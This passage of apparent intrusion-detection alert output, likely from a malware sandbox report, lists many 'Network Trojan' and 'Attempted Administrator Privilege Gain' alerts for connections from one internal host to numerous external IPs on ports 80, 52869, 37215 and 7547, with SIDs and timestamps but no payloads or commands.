            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.214.72.4557656802846457 10/23/22-17:57:31.240282
            SID:2846457
            Source Port:57656
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.163.117.16440232802846457 10/23/22-17:57:53.176295
            SID:2846457
            Source Port:40232
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.217.4.15642304802027121 10/23/22-17:57:21.038752
            SID:2027121
            Source Port:42304
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.100.232.2737994802027121 10/23/22-17:56:46.623464
            SID:2027121
            Source Port:37994
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2337.77.74.2554974528692027339 10/23/22-17:58:30.506992
            SID:2027339
            Source Port:54974
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.49.47.853804802027121 10/23/22-17:56:46.390283
            SID:2027121
            Source Port:53804
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.87.80.2645896802846380 10/23/22-17:57:48.883208
            SID:2846380
            Source Port:45896
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.12.80.8534194802846380 10/23/22-17:56:39.207837
            SID:2846380
            Source Port:34194
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.154.29.24744908802846457 10/23/22-17:57:14.328185
            SID:2846457
            Source Port:44908
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.163.217.23755750802846457 10/23/22-17:58:10.277439
            SID:2846457
            Source Port:55750
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23169.1.233.9038006802846380 10/23/22-17:58:09.345906
            SID:2846380
            Source Port:38006
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.81.57.11838752802846380 10/23/22-17:56:39.359447
            SID:2846380
            Source Port:38752
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.34.112.10836420802027121 10/23/22-17:57:10.301508
            SID:2027121
            Source Port:36420
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23164.155.111.4843136802846457 10/23/22-17:57:22.533590
            SID:2846457
            Source Port:43136
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2370.62.230.25443020802835221 10/23/22-17:57:38.477263
            SID:2835221
            Source Port:43020
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.228.200.11355508528692027339 10/23/22-17:57:14.125728
            SID:2027339
            Source Port:55508
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.34.101.12544744528692027339 10/23/22-17:58:32.710280
            SID:2027339
            Source Port:44744
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.101.105.3132814802027121 10/23/22-17:57:40.667718
            SID:2027121
            Source Port:32814
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.80.200.21038398802027121 10/23/22-17:58:15.223435
            SID:2027121
            Source Port:38398
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.118.111.18436898802027121 10/23/22-17:57:31.191166
            SID:2027121
            Source Port:36898
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.214.95.17742752802846457 10/23/22-17:58:01.316273
            SID:2846457
            Source Port:42752
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.78.31.20632818802846380 10/23/22-17:57:07.329941
            SID:2846380
            Source Port:32818
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2352.194.164.20645512802841623 10/23/22-17:57:07.686714
            SID:2841623
            Source Port:45512
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23154.213.156.16046204802841623 10/23/22-17:57:44.512769
            SID:2841623
            Source Port:46204
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.237.207.24536402802846457 10/23/22-17:56:52.704370
            SID:2846457
            Source Port:36402
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.223.43.23833270802027121 10/23/22-17:58:27.442268
            SID:2027121
            Source Port:33270
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.57.217.12436848802846380 10/23/22-17:57:49.327759
            SID:2846380
            Source Port:36848
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.73.254.21857834802846380 10/23/22-17:57:03.498319
            SID:2846380
            Source Port:57834
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.52.121.1444068802846380 10/23/22-17:57:10.948665
            SID:2846380
            Source Port:44068
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.76.131.10534622802846380 10/23/22-17:57:24.960930
            SID:2846380
            Source Port:34622
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.90.104.16147350802846380 10/23/22-17:58:09.651122
            SID:2846380
            Source Port:47350
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2318.185.14.12156320802841623 10/23/22-17:56:59.044847
            SID:2841623
            Source Port:56320
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.128.226.3152330802846457 10/23/22-17:57:47.812263
            SID:2846457
            Source Port:52330
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.23.255.7846894802846457 10/23/22-17:57:07.080876
            SID:2846457
            Source Port:46894
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.248.211.552232802846380 10/23/22-17:57:11.369396
            SID:2846380
            Source Port:52232
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23164.92.188.23037294802846457 10/23/22-17:58:34.368348
            SID:2846457
            Source Port:37294
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.150.17951246802027121 10/23/22-17:57:59.939067
            SID:2027121
            Source Port:51246
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.232.16.181.16937080802846457 10/23/22-17:57:28.752685
            SID:2846457
            Source Port:37080
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.45.66.11534348802846457 10/23/22-17:57:35.597475
            SID:2846457
            Source Port:34348
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23186.78.174.7339924802835221 10/23/22-17:58:29.701765
            SID:2835221
            Source Port:39924
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.124.15.24849894802846380 10/23/22-17:57:54.139204
            SID:2846380
            Source Port:49894
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.182.68.20157730802846380 10/23/22-17:57:03.553360
            SID:2846380
            Source Port:57730
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.133.227.16453244802027121 10/23/22-17:57:18.661578
            SID:2027121
            Source Port:53244
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23171.1.89.12945514802846457 10/23/22-17:58:21.641440
            SID:2846457
            Source Port:45514
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23104.103.111.21952660802841623 10/23/22-17:58:06.256188
            SID:2841623
            Source Port:52660
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.55.174.19148554802846380 10/23/22-17:57:03.512340
            SID:2846380
            Source Port:48554
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.112.100.7657610802846457 10/23/22-17:56:52.717306
            SID:2846457
            Source Port:57610
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.135.102.12243920802846380 10/23/22-17:57:49.358932
            SID:2846380
            Source Port:43920
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.20.41.5336014802846457 10/23/22-17:58:21.665745
            SID:2846457
            Source Port:36014
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.101.146.24736554802027121 10/23/22-17:57:33.443735
            SID:2027121
            Source Port:36554
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2337.72.203.3554426528692027339 10/23/22-17:58:30.539666
            SID:2027339
            Source Port:54426
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23169.148.66.8138822802846380 10/23/22-17:58:30.924119
            SID:2846380
            Source Port:38822
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.32.58.11139354802846380 10/23/22-17:58:27.257371
            SID:2846380
            Source Port:39354
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.55.105.11544930802846457 10/23/22-17:57:07.202183
            SID:2846457
            Source Port:44930
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.236.227.17438636528692027339 10/23/22-17:58:14.781469
            SID:2027339
            Source Port:38636
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.252.102.16047992802846457 10/23/22-17:58:33.323703
            SID:2846457
            Source Port:47992
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.132.135.7753470802846457 10/23/22-17:57:03.490780
            SID:2846457
            Source Port:53470
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.61.47.20332828802846380 10/23/22-17:57:18.808202
            SID:2846380
            Source Port:32828
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.193.10940040802027121 10/23/22-17:57:49.334871
            SID:2027121
            Source Port:40040
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.167.1.3160102802027121 10/23/22-17:56:58.131054
            SID:2027121
            Source Port:60102
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.62.10.5247822802846380 10/23/22-17:57:55.412772
            SID:2846380
            Source Port:47822
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.251.133.17635036802841623 10/23/22-17:58:18.782861
            SID:2841623
            Source Port:35036
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2323.33.171.14857632802835222 10/23/22-17:57:40.325812
            SID:2835222
            Source Port:57632
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23206.189.127.1054244802846380 10/23/22-17:57:18.559033
            SID:2846380
            Source Port:54244
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2383.61.8.23760948802846380 10/23/22-17:58:19.895356
            SID:2846380
            Source Port:60948
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.223.4.1852418802846457 10/23/22-17:58:10.420211
            SID:2846457
            Source Port:52418
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.55.134.17442224802846380 10/23/22-17:56:55.302550
            SID:2846380
            Source Port:42224
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.252.74.9347202802846457 10/23/22-17:57:07.197733
            SID:2846457
            Source Port:47202
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.213.33.19145434802846457 10/23/22-17:58:07.936248
            SID:2846457
            Source Port:45434
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.86.69.7040030802027121 10/23/22-17:57:54.677600
            SID:2027121
            Source Port:40030
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.6.99.16338428802846380 10/23/22-17:58:17.015300
            SID:2846380
            Source Port:38428
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.250.10148572802027121 10/23/22-17:58:05.326044
            SID:2027121
            Source Port:48572
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23185.10.158.2156654802841623 10/23/22-17:56:51.489662
            SID:2841623
            Source Port:56654
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.110.227.6448552802027121 10/23/22-17:56:55.620612
            SID:2027121
            Source Port:48552
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.88.152.12037786802027121 10/23/22-17:56:53.158120
            SID:2027121
            Source Port:37786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23195.164.254.22945374528692027339 10/23/22-17:58:30.527981
            SID:2027339
            Source Port:45374
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2323.40.26.22344698802841623 10/23/22-17:57:12.938656
            SID:2841623
            Source Port:44698
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.16.247.6956900802846457 10/23/22-17:57:46.246485
            SID:2846457
            Source Port:56900
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.40.35.6046174802846457 10/23/22-17:57:07.197807
            SID:2846457
            Source Port:46174
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23197.25.212.3157758802835221 10/23/22-17:57:11.163825
            SID:2835221
            Source Port:57758
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2354.230.110.18644904802835222 10/23/22-17:57:33.314706
            SID:2835222
            Source Port:44904
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.234.151.23938852802841623 10/23/22-17:58:29.254030
            SID:2841623
            Source Port:38852
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.166.243.18654270802846457 10/23/22-17:57:00.491512
            SID:2846457
            Source Port:54270
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.14.255.22459990802846380 10/23/22-17:57:24.977401
            SID:2846380
            Source Port:59990
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.162.214.6154798802027121 10/23/22-17:57:36.301164
            SID:2027121
            Source Port:54798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2386.94.8.10550242802846380 10/23/22-17:57:33.283591
            SID:2846380
            Source Port:50242
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.210.71.12038890802846380 10/23/22-17:58:27.300687
            SID:2846380
            Source Port:38890
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.165.74.1949028802846380 10/23/22-17:57:46.287055
            SID:2846380
            Source Port:49028
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.241.95.12437092802841623 10/23/22-17:58:37.928792
            SID:2841623
            Source Port:37092
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.250.35.12441982802846380 10/23/22-17:56:58.160862
            SID:2846380
            Source Port:41982
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.240.110.20937950372152835222 10/23/22-17:58:28.949107
            SID:2835222
            Source Port:37950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.89.118.15855294802027121 10/23/22-17:57:56.443829
            SID:2027121
            Source Port:55294
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.244.214.14857008802027121 10/23/22-17:56:53.180020
            SID:2027121
            Source Port:57008
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2337.59.182.22844582802846457 10/23/22-17:57:31.274748
            SID:2846457
            Source Port:44582
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2354.145.127.17257618802841623 10/23/22-17:58:14.489760
            SID:2841623
            Source Port:57618
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.225.62.12451002802846457 10/23/22-17:57:47.833690
            SID:2846457
            Source Port:51002
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.180.171.16433066802846380 10/23/22-17:58:06.311768
            SID:2846380
            Source Port:33066
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.72.5.24939794802846380 10/23/22-17:57:18.656565
            SID:2846380
            Source Port:39794
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.56.132.6240336802027121 10/23/22-17:57:45.060050
            SID:2027121
            Source Port:40336
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.155.211.18649866802027121 10/23/22-17:58:07.336838
            SID:2027121
            Source Port:49866
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.86.94.25544218802027121 10/23/22-17:57:38.707261
            SID:2027121
            Source Port:44218
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.152.85.15535622802846380 10/23/22-17:57:18.657475
            SID:2846380
            Source Port:35622
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.32.61.5133928802846380 10/23/22-17:56:49.720674
            SID:2846380
            Source Port:33928
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.128.204.8339382802846457 10/23/22-17:57:58.562315
            SID:2846457
            Source Port:39382
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.86.78.15153844802027121 10/23/22-17:58:30.397264
            SID:2027121
            Source Port:53844
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23181.41.202.8635206802846380 10/23/22-17:57:10.953928
            SID:2846380
            Source Port:35206
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.35.48.22951988802846457 10/23/22-17:57:38.013530
            SID:2846457
            Source Port:51988
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.247.23.883563075472023548 10/23/22-17:58:02.112528
            SID:2023548
            Source Port:35630
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.241.118.18549012802835221 10/23/22-17:57:38.912493
            SID:2835221
            Source Port:49012
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.169.156.954126802027121 10/23/22-17:58:36.316715
            SID:2027121
            Source Port:54126
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2334.76.74.10445154802835221 10/23/22-17:56:47.921557
            SID:2835221
            Source Port:45154
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.238.101.21546354802027121 10/23/22-17:58:05.406457
            SID:2027121
            Source Port:46354
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.9.41.15537402802027121 10/23/22-17:58:30.387777
            SID:2027121
            Source Port:37402
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23181.193.9.1845328802846380 10/23/22-17:57:13.788226
            SID:2846380
            Source Port:45328
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.74.115.13251736802027121 10/23/22-17:57:10.629643
            SID:2027121
            Source Port:51736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2383.239.86.18154786802846380 10/23/22-17:58:19.925560
            SID:2846380
            Source Port:54786
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2341.225.51.14050464802835221 10/23/22-17:58:29.466955
            SID:2835221
            Source Port:50464
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.98.101.15960440802027121 10/23/22-17:57:01.063687
            SID:2027121
            Source Port:60440
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23122.116.94.9237090802841623 10/23/22-17:57:28.658822
            SID:2841623
            Source Port:37090
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.111.250.15860670802027121 10/23/22-17:57:49.311792
            SID:2027121
            Source Port:60670
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.176.83.6157604802846380 10/23/22-17:57:25.070394
            SID:2846380
            Source Port:57604
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.165.26.15335618802846380 10/23/22-17:57:07.288541
            SID:2846380
            Source Port:35618
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.95.10.14644322802846380 10/23/22-17:57:37.887291
            SID:2846380
            Source Port:44322
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.214.78.4754170802846380 10/23/22-17:56:55.632050
            SID:2846380
            Source Port:54170
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.200.247.19333682802027121 10/23/22-17:58:05.284705
            SID:2027121
            Source Port:33682
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.75.200.10259758802846380 10/23/22-17:58:09.114577
            SID:2846380
            Source Port:59758
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.189.150.18458726802846380 10/23/22-17:57:00.053342
            SID:2846380
            Source Port:58726
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.158.160.751674802027121 10/23/22-17:57:34.534739
            SID:2027121
            Source Port:51674
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.151.37.534322802846380 10/23/22-17:57:58.356034
            SID:2846380
            Source Port:34322
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.85.57.15856762802846380 10/23/22-17:58:09.811552
            SID:2846380
            Source Port:56762
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.238.225.16148844802846380 10/23/22-17:58:27.248556
            SID:2846380
            Source Port:48844
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.126.21253874802027121 10/23/22-17:58:02.115636
            SID:2027121
            Source Port:53874
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.7.9.5555484802846380 10/23/22-17:58:22.290851
            SID:2846380
            Source Port:55484
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.248.209.24548582802027121 10/23/22-17:57:25.854605
            SID:2027121
            Source Port:48582
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.214.194.20333140802846457 10/23/22-17:57:31.240332
            SID:2846457
            Source Port:33140
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.101.177.21939114802027121 10/23/22-17:58:24.017103
            SID:2027121
            Source Port:39114
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.145.50.17451190802846380 10/23/22-17:57:14.980709
            SID:2846380
            Source Port:51190
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23197.0.137.1375436075472023548 10/23/22-17:56:53.608732
            SID:2023548
            Source Port:54360
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.32.68.8936496802846380 10/23/22-17:58:33.195889
            SID:2846380
            Source Port:36496
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23197.1.134.19957460372152835222 10/23/22-17:57:57.154835
            SID:2835222
            Source Port:57460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.219.3.14258788802027121 10/23/22-17:58:19.584441
            SID:2027121
            Source Port:58788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.21.223.20151174802846457 10/23/22-17:58:10.304546
            SID:2846457
            Source Port:51174
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.208.230.5437526802027121 10/23/22-17:57:28.451752
            SID:2027121
            Source Port:37526
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23188.158.91.12059320802846457 10/23/22-17:57:47.925030
            SID:2846457
            Source Port:59320
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2361.42.57.19348056802846457 10/23/22-17:57:51.197183
            SID:2846457
            Source Port:48056
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.37.8755274802027121 10/23/22-17:57:07.968046
            SID:2027121
            Source Port:55274
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.221.59.6250114802027121 10/23/22-17:57:12.951910
            SID:2027121
            Source Port:50114
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.67.46.21049302802027121 10/23/22-17:57:13.027539
            SID:2027121
            Source Port:49302
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.236.156.1158694802846457 10/23/22-17:58:37.501669
            SID:2846457
            Source Port:58694
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23190.192.207.545865275472023548 10/23/22-17:57:55.482280
            SID:2023548
            Source Port:58652
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.165.254.19641084802846457 10/23/22-17:57:41.256604
            SID:2846457
            Source Port:41084
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23164.138.115.15240582528692027339 10/23/22-17:57:22.431427
            SID:2027339
            Source Port:40582
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
